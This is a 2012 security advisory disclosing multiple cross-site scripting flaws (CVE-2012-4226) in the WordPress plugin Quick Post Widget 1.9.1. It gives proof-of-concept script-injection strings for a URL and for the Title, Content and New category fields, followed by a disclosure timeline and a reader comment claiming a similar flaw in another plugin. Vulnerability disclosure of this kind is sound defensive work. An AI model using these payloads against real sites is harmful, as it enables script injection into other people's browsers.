SSCHADV2012-016 - WordPress Plugin 'Quick Post Widget' 1.9.1 Multiple XSS vulnerabilities
Advisory:
|
WordPress Plugin ‘Quick Post Widget’ 1.9.1 Multiple XSS vulnerabilities
|
Advisory ID:
|
SSCHADV2012-016
|
Author:
|
Stefan Schurtz
|
Affected Software:
|
Successfully tested on Quick Post Widget 1.9.1
|
Vendor URL:
|
|
Vendor Status:
|
informed
|
CVE-ID:
|
CVE-2012-4226
|
======================
Vulnerability Description
======================
Vulnerability Description
======================
The WordPress plugin Quick Post Widget 1.9.1 is prone to multiple XSS vulnerabilities
==============
PoC-Exploit
==============
PoC-Exploit
==============
// GET
http://[target]/wordpress/?"></script><script>alert(/xss/)</script>
// POST
http://[target]/wordpress/ -> Quickpost ‘Title’ -> "></script><script>alert(/xss/)</script>
http://[target]/wordpress/ -> Quickpost ‘Content’ -> "></script><script>alert(/xss/)</script> http://[target]/wordpress/ -> Quickpost ‘New category’ -> "></script><script>alert(/xss/)</script> |
=====
Solution
=====
Solution
=====
-
================
Disclosure Timeline
================
Disclosure Timeline
================
02-Jul-2012 – developer informed
09-Jul-2012 – developer feedback
10-Aug-2012 – post on BugTraq
====
Credits
====
Credits
====
Vulnerabilities found and advisory written by Stefan Schurtz.
=======
References
=======
References
=======
Comments
Display comments as Linear | Threaded
Gregory Gray on :
Sorry, no german
Competing plugin ucan-post seems similarly effected based upon a quick test at their demo website : http://cartpauj.icomnow.com/ucan-demo/?ucanaction=ucanpublish
I assume TDO Mini Forms is also effected as their download has been removed much as quick post widget
Cheers and thanks for the original info… working to fix my install or release patched fork.
G